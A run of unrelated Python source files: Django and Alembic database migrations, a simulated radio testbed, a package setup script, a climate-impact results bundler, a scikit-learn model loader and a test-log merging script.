        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'filer.file': {
            'Meta': {'object_name': 'File'},
            '_file_size': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'folder': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'all_files'", 'null': 'True', 'to': "orm['filer.Folder']"}),
            'has_all_mandatory_data': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
            'original_filename': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'owned_files'", 'null': 'True', 'to': "orm['auth.User']"}),
            'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_filer.file_set'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
            'sha1': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '40', 'blank': 'True'}),
            'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
        },
        'filer.folder': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('parent', 'name'),)", 'object_name': 'Folder'},
            'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'filer_owned_folders'", 'null': 'True', 'to': "orm['auth.User']"}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['filer.Folder']"}),
            u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
        }
    }

    complete_apps = ['cms']
# Copyright (C) 2015 SensorLab, Jozef Stefan Institute http://sensorlab.ijs.si
#
# Written by Tomaz Solc, tomaz.solc@ijs.si
#
# This work has been partially funded by the European Community through the
# 7th Framework Programme project CREW (FP7-ICT-2009-258301).
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see http://www.gnu.org/licenses/

import logging
import Queue
import random
import time

from spectrumwars.testbed import TestbedBase, RadioBase, RadioTimeout, RadioError, TestbedError, RadioPacket

log = logging.getLogger(__name__)

class Radio(RadioBase):
	RECEIVE_TIMEOUT = 2.

	def __init__(self, addr, dispatcher, send_delay):
		super(Radio, self).__init__()

		self.addr = addr
		self.neighbor = None
		self.dispatcher = dispatcher
		self.q = Queue.Queue()

		self.frequency = 0
		self.bandwidth = 0

		self.send_delay = send_delay

	def _recv(self, addr, bindata, frequency, bandwidth):
		if self.frequency == frequency and self.bandwidth == bandwidth and self.addr == addr:
			self.q.put(bindata)

	def set_configuration(self, frequency, bandwidth, power):
		self.frequency = frequency
		self.bandwidth = bandwidth

	def binsend(self, bindata):
		self.dispatcher(self.neighbor, bindata, self.frequency, self.bandwidth)
		time.sleep(self.send_delay)

	def binrecv(self, timeout=None):
		if timeout is None:
			timeout = self.RECEIVE_TIMEOUT

		try:
			bindata = self.q.get(True, timeout)
		except Queue.Empty:
			raise RadioTimeout
		else:
			return bindata

class Testbed(TestbedBase):

	RADIO_CLASS = Radio

	def __init__(self, send_delay=.1, frequency_range=64, bandwidth_range=10, power_range=10, packet_size=1024):
		self.send_delay = float(send_delay)
		self.frequency_range = int(frequency_range)
		self.bandwidth_range = int(bandwidth_range)
		self.power_range = int(power_range)

		self.RADIO_CLASS.PACKET_SIZE = int(packet_size) + 1

		self.radios = []

		# for each channel, we keep the timestamp of the last
		# transmission. we use this for simulated spectrum sensing and
		# for detecting collisions.
		self.channels = [0] * self.frequency_range

		self.i = 0

	def _get_radio(self):
		r = Radio(self.i, self._dispatcher, self.send_delay)
		self.radios.append(r)

		self.i += 1

		return r

	def _dispatcher(self, addr, bindata, frequency, bandwidth):
		now = self.time()

		has_collision = (now - self.channels[frequency]) > self.send_delay
		self.channels[frequency] = now

		if has_collision:
			# note that when packets collide, the first one goes
			# through while the later ones fail. this is different
			# than in reality: all should fail. But this would
			# be complicated to implement in practice.
			for radio in self.radios:
				radio._recv(addr, bindata, frequency, bandwidth)
		else:
			log.debug("packet collision detected on channel %d" % (frequency,))

	def get_radio_pair(self):
		dst = self._get_radio()
		src = self._get_radio()

		dst.neighbor = src.addr
		src.neighbor = dst.addr

		return dst, src

	def get_spectrum(self):

		spectrum = []
		now = self.time()

		for time in self.channels:
			if now - time < .5:
				p = random.randint(-40, -20)
			else:
				p = random.randint(-90, -80)

			spectrum.append(p)

		return tuple(spectrum)

	def get_frequency_range(self):
		return self.frequency_range

	def get_bandwidth_range(self):
		return self.bandwidth_range

	def get_power_range(self):
		return self.power_range

"""add graphql ACL to users

Revision ID: 2d4882d39dbb
Revises: c4d0e9ec46a9

"""

from alembic import op
import sqlalchemy as sa


# revision identifiers, used by Alembic.
revision = '2d4882d39dbb'
down_revision = 'dc2848563b53'

POLICY_NAME = 'wazo_default_user_policy'
ACL_TEMPLATES = ['dird.graphql.me']

policy_table = sa.sql.table(
    'auth_policy', sa.Column('uuid', sa.String(38)), sa.Column('name', sa.String(80))
)
acl_template_table = sa.sql.table(
    'auth_acl_template', sa.Column('id', sa.Integer), sa.Column('template', sa.Text)
)
policy_template = sa.sql.table(
    'auth_policy_template',
    sa.Column('policy_uuid', sa.String(38)),
    sa.Column('template_id', sa.Integer),
)


def _find_acl_template(conn, acl_template):
    query = (
        sa.sql.select([acl_template_table.c.id])
        .where(acl_template_table.c.template == acl_template)
        .limit(1)
    )
    return conn.execute(query).scalar()


def _find_acl_templates(conn, acl_templates):
    acl_template_ids = []
    for acl_template in acl_templates:
        acl_template_id = _find_acl_template(conn, acl_template)
        if acl_template_id:
            acl_template_ids.append(acl_template_id)
    return acl_template_ids


def _get_policy_uuid(conn, policy_name):
    policy_query = sa.sql.select([policy_table.c.uuid]).where(
        policy_table.c.name == policy_name
    )

    for policy in conn.execute(policy_query).fetchall():
        return policy[0]


def _insert_acl_template(conn, acl_templates):
    acl_template_ids = []
    for acl_template in acl_templates:
        acl_template_id = _find_acl_template(conn, acl_template)
        if not acl_template_id:
            query = (
                acl_template_table.insert()
                .returning(acl_template_table.c.id)
                .values(template=acl_template)
            )
            acl_template_id = conn.execute(query).scalar()
        acl_template_ids.append(acl_template_id)
    return acl_template_ids


def _get_acl_template_ids(conn, policy_uuid):
    query = sa.sql.select([policy_template.c.template_id]).where(
        policy_template.c.policy_uuid == policy_uuid
    )
    return [acl_template_id for (acl_template_id,) in conn.execute(query).fetchall()]


def upgrade():
    conn = op.get_bind()
    policy_uuid = _get_policy_uuid(conn, POLICY_NAME)
    if not policy_uuid:
        return

    acl_template_ids = _insert_acl_template(conn, ACL_TEMPLATES)
    acl_template_ids_already_associated = _get_acl_template_ids(conn, policy_uuid)
    for template_id in set(acl_template_ids) - set(acl_template_ids_already_associated):
        query = policy_template.insert().values(
            policy_uuid=policy_uuid, template_id=template_id
        )
        conn.execute(query)


def downgrade():
    conn = op.get_bind()
    acl_template_ids = _find_acl_templates(conn, ACL_TEMPLATES)
    if not acl_template_ids:
        return

    policy_uuid = _get_policy_uuid(conn, POLICY_NAME)
    if not policy_uuid:
        return

    delete_query = policy_template.delete().where(
        sa.sql.and_(
            policy_template.c.policy_uuid == policy_uuid,
            policy_template.c.template_id.in_(acl_template_ids),
        )
    )
    op.execute(delete_query)

#
# Copyright (c) 2013 Christopher L. Felton
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

try:
    from setuptools import setup
    from setuptools import find_packages
except ImportError:
    from distutils.core import setup
    from pkgutil import walk_packages

    import mn

    # many pypy installs don't have setuptools (?)
    def _find_packages(path='.', prefix=''):
        yield prefix
        prefix = prefix + "."
        for _, name, ispkg in walk_packages(path, 
                                            prefix,
                                            onerror=lambda x: x):
            if ispkg:
                yield name
                
    def find_packages():
        return list(_find_packages(mn.__path__, mn.__name__))
    

setup(name        = "minnesota",
      version     = "0.1pre",
      description = "collection of HDL cores ",
      license     = "LGPL",
      platforms   = ["Any"],
      keywords    = "DSP HDL MyHDL FPGA FX2 USB",

      packages    = find_packages(),
      # @todo need to add the examples and test directories,
      # copy it over ...
      )


# -*- coding: utf-8 -*-
################################################################################
# Copyright 2014, Distributed Meta-Analysis System
################################################################################

"""Software structure for generating Monte-Carlo collections of results.

NOTE: Highest resolution regions are implicitly assumed to be
FIPS-coded counties, but the logic does not require them to be.  FIPS
language should be replaced with generic ID references.

A key structure is the make_generator(fips, times, values) function.
make_generator is passed to the functions that iterate through
different weather forecasts, such as make_tar_ncdf.  It is then called
with each location and daily weather data.  fips is a single county
code, times is a list of yyyyddd formated date values, values is a
list of weather values.

The output of make_generator() is a generator, producing tuples (year,
effect), for whichever years an effect can be computed.

Output file structure:

Each bundle of output impact results of a given type and for a given
weather forecast are in a gzipped tar file containing a single
directory <name>, containing a separate csv file (an effect file) for each
region.  The format of the csv file is:
  year,<label>[,<other labels>]*
  <year>,<impact>[,<prior calculated impact>]*

Basic processing logic:

Some functions, like find_ncdfs_allreal, discover collections of
forecasted variables (within the WDS directory structure), and provide
through enumerators.  Variable collections are dictionaries {variable:
REFERENCE}, where REFERENCE may be a filename, a netCDF, or a
dictionary of {original: netCDF object, data: [days x counties],
times: [yyyyddd]}. [VRD]

Controllers (elsewhere) loop through these, and for each available
forecast call a make_tar_* function passing in a make_generator
function.  The make_tar_* functions call make_generator with each
individual region, retrieving a set of results, and then package those
results into the output file format.

Temporary directories (characterized by random letters) are used to
hold the results as they're being generated (before being bundled into
tars).
"""

__copyright__ = "Copyright 2014, Distributed Meta-Analysis System"

__author__ = "James Rising"
__credits__ = ["James Rising"]
__maintainer__ = "James Rising"
__email__ = "jar2234@columbia.edu"

__status__ = "Production"
__version__ = "$Revision$"
# $Source$

import tarfile, os, csv, re, random, string
import numpy as np
try:
    # this is required for nc4's, but we can wait to fail
    from netCDF4 import Dataset
except:
    pass

FIPS_COMPLETE = '__complete__' # special FIPS code for the last county
LATEX_STRING = '__latexstr__' # special FIPS code for making a LaTeX representation

### Effect Bundle Generation

## Temporary directory management

def enter_local_tempdir(prefix=''):
    """Create and set the working directory as a new temporary directory.

    Returns the name of the temporary directory (to be passed to
    exit_local_tempdir).
    """

    suffix = ''.join(random.choice(string.lowercase) for i in range(6))

    os.mkdir(prefix + suffix)
    os.chdir(prefix + suffix)

    return prefix + suffix

def exit_local_tempdir(tempdir, killit=True):
    """Return to the root output directory (and optionally delete the
    temporary directory).

    tempdir is the output of enter_local_tempdir.
    """

    os.chdir("..")
    if killit:
        kill_local_tempdir(tempdir)

def kill_local_tempdir(tempdir):
    """Remove all contents of a temporary directory.

    Call after exit_local_tempdir is called, only if killit=False.
    """

    os.system("rm -r " + tempdir)

## General helper functions for creation

def send_fips_complete(make_generator):
    """Call after the last county of a loop of counties, to clean up any memory.
    """

    print "Complete the FIPS"
    try:
        iterator = make_generator(FIPS_COMPLETE, None, None).next()
        print "Success"
    except StopIteration, e:
        pass
    except Exception, e:
        print e
        pass

def get_target_path(targetdir, name):
    """Helper function to use the targetdir directory if its provided.
    """

    if targetdir is not None:
        return os.path.join(targetdir, name)
    else:
        return name

def write_effect_file(path, fips, generator, collabel):
    """Write the effects for a single FIPS-coded county.

    path: relative path for file
    fips: the unique id of the region
    generator: a enumerator of tuples/lists with individual rows
    collabel: label for one (string) or more (list) columns after the
    year column
    """

    # Create the CSV file
    with open(os.path.join(path, fips + '.csv'), 'wb') as csvfp:
        writer = csv.writer(csvfp, quoting=csv.QUOTE_MINIMAL)

        # Write the header row
        if not isinstance(collabel, list):
            writer.writerow(["year", collabel])
        else:
            writer.writerow(["year"] + collabel)

        # Write all data rows
        for values in generator:
            writer.writerow(values)

## Top-level bundle creation functions

def make_tar_dummy(name, acradir, make_generator, targetdir=None, collabel="fraction"):
    """Constructs a tar of files for each county, using NO DATA.
    Calls make_generator for each county, using a filename of
    counties.

    name: the name of the effect bundle.
    acradir: path to the DMAS acra directory.
    make_generator(fips, times, daily): returns an iterator of (year, effect).
    targetdir: path to a final destination for the bundle
    collabel: the label for the effect column
    """

    tempdir = enter_local_tempdir()
    os.mkdir(name) # directory for county files

    # Generate a effect file for each county in regionsA
    with open(os.path.join(acradir, 'regions/regionsANSI.csv')) as countyfp:
        reader = csv.reader(countyfp)
        reader.next() # ignore header

        # Each row is a county
        for row in reader:
            fips = canonical_fips(row[0])
            print fips

            # Call generator (with no data)
            generator = make_generator(fips, None, None)
            if generator is None:
                continue

            # Construct the effect file
            write_effect_file(name, fips, generator, collabel)

    send_fips_complete(make_generator)

    # Generate the bundle tar
    target = get_target_path(targetdir, name)
    os.system("tar -czf " + os.path.join("..", target) + ".tar.gz " + name)

    # Remove the working directory
    exit_local_tempdir(tempdir)

def make_tar_duplicate(name, filepath, make_generator, targetdir=None, collabel="fraction"):
    """Constructs a tar of files for each county that is described in
    an existing bundle.  Passes NO DATA to make_generator.

    name: the name of the effect bundle.
    filepath: path to an existing effect bundle
    make_generator(fips, times, daily): returns an iterator of (year, effect).
    targetdir: path to a final destination for the bundle
    collabel: the label for the effect column
    """

    tempdir = enter_local_tempdir()
    os.mkdir(name)

    # Iterate through all FIPS-titled files in the effect bundle
    with tarfile.open(filepath) as tar:
        for item in tar.getnames()[1:]:
            fips = item.split('/')[1][0:-4]
            print fips

            # Call make_generator with no data
            generator = make_generator(fips, None, None)
            if generator is None:
                continue

            # Construct the effect file
            write_effect_file(name, fips, generator, collabel)

    send_fips_complete(make_generator)

    # Generate the bundle tar
    target = get_target_path(targetdir, name)
    os.system("tar -czf " + os.path.join("..", target) + ".tar.gz " + name)

    # Remove the working directory
    exit_local_tempdir(tempdir)

def make_tar_ncdf(name, weather_ncdf, var, make_generator, targetdir=None, collabel="fraction"):
    """Constructs a tar of files for each county, describing yearly results.

    name: the name of the effect bundle.
    weather_ncdf: str for one, or {variable: filename} for calling
      generator with {variable: data}.
    var: str for one, or [str] for calling generator with {variable: data}
    make_generator(fips, times, daily): returns an iterator of (year, effect).
    targetdir: path to a final destination for the bundle, or a
      function to take the data
    collabel: the label for the effect column
    """

    # If this is a function, we just start iterating
    if hasattr(targetdir, '__call__'):
        call_with_generator(name, weather_ncdf, var, make_generator, targetdir)
        return

    # Create the working directory
    tempdir = enter_local_tempdir()
    os.mkdir(name)

    # Helper function for calling write_effect_file with collabel
    def write_csv(name, fips, generator):
        write_effect_file(name, fips, generator, collabel)

    # Iterate through the data
    call_with_generator(name, weather_ncdf, var, make_generator, write_csv)

    # Create the effect bundle
    target = get_target_path(targetdir, name)
    os.system("tar -czf " + os.path.join("..", target) + ".tar.gz " + name)

    # Remove the working directory
    exit_local_tempdir(tempdir)

def yield_given(name, yyyyddd, weather, make_generator):
    """Yields (as an iterator) rows of the result of applying make_generator to the given weather.

    name: the name of the effect bundle.
    yyyyddd: YYYYDDD formated date values.
    weather: a dictionary to call generator with {variable: data}.
    make_generator(fips, times, daily): returns an iterator of (year, effect).
    """
    generator = make_generator(0, yyyyddd, weather)
    if generator is None:
        return

    # Call targetfunc with the result
    for values in generator:
        yield values

    # Signal the end of the counties
    send_fips_complete(make_generator)

def call_with_generator(name, weather_ncdf, var, make_generator, targetfunc):
    """Helper function for calling make_generator with each variable
    set.  In cases with multiple weather datasets, assumes all use the
    same clock (sequence of times) and geography (sequence of
    counties).

    name: the name of the effect bundle.
    weather_ncdf: str for one, or {variable: filename} for calling
      generator with {variable: data}.
    var: str for one, or [str] for calling generator with {variable: data}
    make_generator(fips, times, daily): returns an iterator of (year, effect).
    targetfunc: function(name, fips, generator) to handle results
    """

    if isinstance(weather_ncdf, dict) and isinstance(var, list):
        # In this case, we generate a dictionary of variables
        weather = {}
        times = None # All input assumed to have same clock

        # Filter by the variables in var
        for variable in var:
            # Retrieve the netcdf object (rootgrp) and add to weather dict
            if isinstance(weather_ncdf[variable], str):
                # Open this up as a netCDF and read data into array
                rootgrp = Dataset(weather_ncdf[variable], 'r+', format='NETCDF4')
                weather[variable] = rootgrp.variables[variable][:,:]
            elif isinstance(weather_ncdf[variable], dict):
                # This is an {original, data, times} dictionary
                rootgrp = weather_ncdf[variable]['original']
                weather[variable] = weather_ncdf[variable]['data']
                if 'times' in weather_ncdf[variable]:
                    times = weather_ncdf[variable]['times']
            else:
                # This is already a netcdf object
                rootgrp = weather_ncdf[variable]
                weather[variable] = rootgrp.variables[variable][:,:]

            # Collect additional information from netcdf object
            counties = rootgrp.variables['fips']
            lats = rootgrp.variables['lat']
            lons = rootgrp.variables['lon']
            if times is None:
                times = rootgrp.variables['time']
    else:
        # We just want a single variable (not a dictionary of them)
        # Retrieve the netcdf object (rootgrp) and add to weather dict
        if isinstance(weather_ncdf, str):
            # Open this up as a netCDF and read into array
            rootgrp = Dataset(weather_ncdf, 'r+', format='NETCDF4')
            weather = rootgrp.variables[var][:,:]
        elif isinstance(weather_ncdf, dict):
            # This is an {original, data, times} dictionary
            rootgrp = weather_ncdf['original']
            weather = weather_ncdf['data']
        else:
            # This is already a netcdf object
            rootgrp = weather_ncdf
            weather = rootgrp.variables[var][:,:]

        # Collect additional information from netcdf object
        counties = rootgrp.variables['fips']
        lats = rootgrp.variables['lat']
        lons = rootgrp.variables['lon']
        times = rootgrp.variables['time']

    # Loop through counties, calling make_generator with each
    for ii in range(len(counties)):
        fips = canonical_fips(counties[ii])
        print fips

        # Extract the weather just for this county
        if not isinstance(weather, dict):
            daily = weather[:,ii]
        else:
            daily = {}
            for variable in weather:
                daily[variable] = weather[variable][:,ii]

        # Call make_generator for this county
        generator = make_generator(fips, times, daily, lat=lats[ii], lon=lons[ii])
        if generator is None:
            continue

        # Call targetfunc with the result
        targetfunc(name, fips, generator)

    # Signal the end of the counties
    send_fips_complete(make_generator)

def make_tar_ncdf_profile(weather_ncdf, var, make_generator):
    """Like make_tar_ncdf, except that just goes through the motions,
    and only for 100 counties
    weather_ncdf: str for one, or {variable: filename} for calling
      generator with {variable: data}.
    var: str for one, or [str] for calling generator with {variable: data}
    """

    # Open a single netCDF if only one filename passed in
    if isinstance(weather_ncdf, str):
        # Collect the necessary info
        rootgrp = Dataset(weather_ncdf, 'r+', format='NETCDF4')
        counties = rootgrp.variables['fips']
        lats = rootgrp.variables['lat']
        lons = rootgrp.variables['lon']
        times = rootgrp.variables['time']
        weather = rootgrp.variables[var][:,:]
    else:
        # Open all netCDF referenced in var
        weather = {} # Construct a dictionary of [yyyyddd x county] arrays
        for variable in var:
            rootgrp = Dataset(weather_ncdf[variable], 'r+', format='NETCDF4')
            counties = rootgrp.variables['fips']
            lats = rootgrp.variables['lat']
            lons = rootgrp.variables['lon']
            times = rootgrp.variables['time']
            weather[variable] = rootgrp.variables[variable][:,:]

    # Just do 100 counties
    for ii in range(100):
        # Always using 5 digit fips
        fips = canonical_fips(counties[ii])
        print fips

        # Construct the input array for this county
        if not isinstance(weather, dict):
            daily = weather[:,ii]
        else:
            daily = {}
            for variable in weather:
                daily[variable] = weather[variable][:,ii]

        # Generate the generator
        generator = make_generator(fips, times, daily, lat=lats[ii], lon=lons[ii])
        if generator is None:
            continue

        # Just print out the results
        print "year", "fraction"

        for (year, effect) in generator:
            print year, effect

### Effect calculation functions

## make_generator functions

def load_tar_make_generator(targetdir, name, column=None):
    """Load existing data for additional calculations.
    targetdir: relative path to a directory of effect bundles.
    name: the effect name (so the effect bundle is at <targetdir>/<name>.tar.gz
    """

    # Extract the existing tar into a loader tempdir
    tempdir = enter_local_tempdir('loader-')
    os.system("tar -xzf " + os.path.join("..", targetdir, name + ".tar.gz"))
    exit_local_tempdir(tempdir, killit=False)

    def generate(fips, yyyyddd, temps, *args, **kw):
        # When all of the counties are done, kill the local dir
        if fips == FIPS_COMPLETE:
            print "Remove", tempdir
            # We might be in another tempdir-- check
            if os.path.exists(tempdir):
                kill_local_tempdir(tempdir)
            else:
                kill_local_tempdir(os.path.join('..', tempdir))
            return

        # Open up the effect for this bundle
        fipspath = os.path.join(tempdir, name, fips + ".csv")
        if not os.path.exists(fipspath):
            fipspath = os.path.join('..', fipspath)
            if not os.path.exists(fipspath):
                # If we can't find this, just return a single year with 0 effect
                print fipspath + " doesn't exist"
                yield (yyyyddd[0] / 1000, 0)
                raise StopIteration()

        with open(fipspath) as fp:
            reader = csv.reader(fp)
            reader.next() # ignore header

            # yield the same values that generated this effect file
            for row in reader:
                if column is None:
                    yield [int(row[0])] + map(float, row[1:])
                else:
                    yield (int(row[0]), float(row[column]))

    return generate

### Aggregation from counties to larger regions

def aggregate_tar(name, scale_dict=None, targetdir=None, collabel="fraction", get_region=None, report_all=False):
    """Aggregates results from counties to larger regions.
    name: the name of an impact, already constructed into an effect bundle
    scale_dict: a dictionary of weights, per county
    targetdir: directory holding both county bundle and to hold region bundle
    collabel: Label for result column(s)
    get_region: either None (uses first two digits of FIPS-- aggregates to state),
      True (combine all counties-- aggregate to national),
      or a function(fips) => code which aggregates each set of counties producing the same name
    report_all: if true, include a whole sequence of results; otherwise, just take first one
    """

    # Get a region name and a get_region function
    region_name = 'region' # final bundle will use this as a suffix

    if get_region is None: # aggregate to state
        get_region = lambda fips: fips[0:2]
        region_name = 'state'
    elif get_region is True: # aggregate to nation
        get_region = lambda fips: 'national'
        region_name = 'national'
    else:
        # get a title, if get_region returns one for dummy-fips "_title_"
        try:
            title = get_region('_title_')
            if title is not None:
                region_name = title
        except:
            pass

    regions = {} # {region code: {year: (numer, denom)}}
    # This is the effect bundle to aggregate
    target = get_target_path(targetdir, name)

    # Generate a temporary directory to extract county results
    tempdir = enter_local_tempdir()
    # Extract all of the results
    os.system("tar -xzf " + os.path.join("..", target) + ".tar.gz")

    # Go through all counties
    for filename in os.listdir(name):
        # If this is a county file
        match = re.match(r'(\d{5})\.csv', filename)
        if match:
            code = match.groups(1)[0] # get the FIPS code

            # Check that it's in the scale_dict
            if scale_dict is not None and code not in scale_dict:
                continue

            # Check which region it is in
            region = get_region(code)
            if region is None:
                continue

            # Prepare the dictionary of results for this region, if necessary
            if region not in regions:
                regions[region] = {} # year => (numer, denom)

            # Get out the current dictioanry of years
            years = regions[region]

            # Go through every year in this effect file
            with open(os.path.join(name, filename)) as csvfp:
                reader = csv.reader(csvfp, delimiter=',')
                reader.next()

                if report_all: # Report entire sequence of results
                    for row in reader:
                        # Get the numerator and denominator for this weighted sum
                        if row[0] not in years:
                            numer, denom = (np.array([0] * (len(row)-1)), 0)
                        else:
                            numer, denom = years[row[0]]

                        # Add on one more value to the weighted sum
                        try:
                            numer = numer + np.array(map(float, row[1:])) * (scale_dict[code] if scale_dict is not None else 1)
                            denom = denom + (scale_dict[code] if scale_dict is not None else 1)
                        except Exception, e:
                            print e

                        # Put the weighted sum calculation back in for this year
                        years[row[0]] = (numer, denom)
                else: # Just report the first result
                    for row in reader:
                        # Get the numerator and denominator for this weighted sum
                        if row[0] not in years:
                            numer, denom = (0, 0)
                        else:
                            numer, denom = years[row[0]]

                        # Add on one more value to the weighted sum
                        numer = numer + float(row[1]) * (scale_dict[code] if scale_dict is not None else 1)
                        denom = denom + (scale_dict[code] if scale_dict is not None else 1)

                        # Put the weighted sum calculation back in for this year
                        years[row[0]] = (numer, denom)

    # Remove all county results from extracted tar
    os.system("rm -r " + name)

    # Start producing directory of region results
    dirregion = name + '-' + region_name
    if not os.path.exists(dirregion):
        os.mkdir(dirregion)

    # For each region that got a result
    for region in regions:
        # Create a new CSV effect file
        with open(os.path.join(dirregion, region + '.csv'), 'wb') as csvfp:
            writer = csv.writer(csvfp, quoting=csv.QUOTE_MINIMAL)
            # Include a header row
            if not isinstance(collabel, list):
                writer.writerow(["year", collabel])
            else:
                writer.writerow(["year"] + collabel)

            # Construct a sorted list of years from the keys of this region's dictionary
            years = map(str, sorted(map(int, regions[region].keys())))

            # For each year, output the weighted average
            for year in years:
                if regions[region][year][1] == 0: # the denom is 0-- never got a value
                    writer.writerow([year, 'NA'])
                else:
                    # Write out the year's result
                    if report_all:
                        writer.writerow([year] + list(regions[region][year][0] / float(regions[region][year][1])))
                    else:
                        writer.writerow([year, float(regions[region][year][0]) / regions[region][year][1]])

    # Construct the effect bundle
    target = get_target_path(targetdir, dirregion)
    os.system("tar -czf " + os.path.join("..", target) + ".tar.gz " + dirregion)

    # Clean up temporary directory
    exit_local_tempdir(tempdir)

from abc import ABC
import configargparse
from sklearn.externals import joblib
from termcolor import colored


class ScikitBase(ABC):
    """
    Base class for AI strategies
    """
    arg_parser = configargparse.get_argument_parser()
    arg_parser.add('-p', '--pipeline', help='trained model/pipeline (*.pkl file)', required=True)
    arg_parser.add('-f', '--feature_names', help='List of features list pipeline (*.pkl file)')
    pipeline = None

    def __init__(self):
        args = self.arg_parser.parse_known_args()[0]
        super(ScikitBase, self).__init__()
        self.pipeline = self.load_pipeline(args.pipeline)
        if args.feature_names:
            self.feature_names = self.load_pipeline(args.feature_names)

    @staticmethod
    def load_pipeline(pipeline_file):
        """
        Loads scikit model/pipeline
        """
        print(colored('Loading pipeline: ' + pipeline_file, 'green'))
        return joblib.load(pipeline_file)

    def fetch_pipeline_from_server(self):
        """
        Method fetches pipeline from server/cloud
        """
        # TODO
        pass

    def predict(self, df):
        """
        Returns predictions based on the model/pipeline
        """
        try:
            return self.pipeline.predict(df)
        except (ValueError, TypeError):
            print(colored('Got ValueError while using scikit model.. ', 'red'))
            return None


import commandRunner as cr
import subprocess
import glob, os, platform, shutil, adb
from pathlib import Path


def combine_browsers_logs(udid):
    cmd = 'rebot -N Combined --outputdir browserlogs/ '

    for idx, device in enumerate(udid):
        #Get all the output.xml files for the devices    
        if platform.system() == "Windows":
            cmd += os.getcwd() + "\\browserlogs\\" + device + "\output.xml "
        else:
            cmd += os.getcwd() + "/browserlogs/" + device + "/output.xml "
    
    cr.run_command(cmd)
    pngs = []

    #For screenshot images
    if platform.system() == "Windows":
        for idx, device in enumerate(udid):
            pngs += glob.glob(os.getcwd() + "\\browserlogs\\" + device + "\\" + "*.png")

            for p in pngs:
                shutil.copy(p, p.replace(device + "\\", ""))
                #remove those that have been moved/copied
                pngs = [p for p in pngs if not p]

    else:    
        for idx, device in enumerate(udid):
            pngs += glob.glob(os.getcwd() + "/browserlogs/" + device + "/" + "*.png")

            for p in pngs:
                shutil.copy(p, p.replace(device + "/", ""))
                #remove those that have been moved/copied
                pngs = [p for p in pngs if not p]

def combine_logs(udid):
    cmd = 'rebot -N Combined --outputdir logs/ '

    for idx, device in enumerate(udid):
        #Get all the output.xml files for the devices    
        if platform.system() == "Windows":
            cmd += os.getcwd() + "\logs\\" + device + "_" + "*\output.xml "
        else:
            cmd += os.getcwd() + "/logs/" + device + "_" + "*/output.xml "
    
    cr.run_command(cmd)
    pngs = []

    #For screenshot images
    if platform.system() == "Windows":
        pngs = glob.glob(os.getcwd() + "\logs\**\*.png")
        for idx, device in enumerate(udid):
            for p in pngs:
                if Path(p).is_file(): #If image exist
                    imgname = p[p.rindex('\\')+1:]
                    k = p.rfind("\logs\\")
                    path = p[:k]
                    newPath = path + "\logs\\" + imgname
                    shutil.move(p,newPath)

    else:    
        pngs = glob.glob(os.getcwd() + "/logs/**/*.png")
        for idx, device in enumerate(udid):
            for p in pngs:
                if Path(p).is_file(): #If image exist
                    imgname = p[p.rindex('/')+1:]
                    k = p.rfind("/logs/")
                    path = p[:k]
                    newPath = path + "/logs/" + imgname
                    shutil.move(p,newPath)

def zip_logs():
    if platform.system() == "Windows":
        cmd = "Compress-Archive logs logs-$(date +%Y-%m-%d-%H%M).zip"
        subprocess.call(["powershell.exe", cmd])

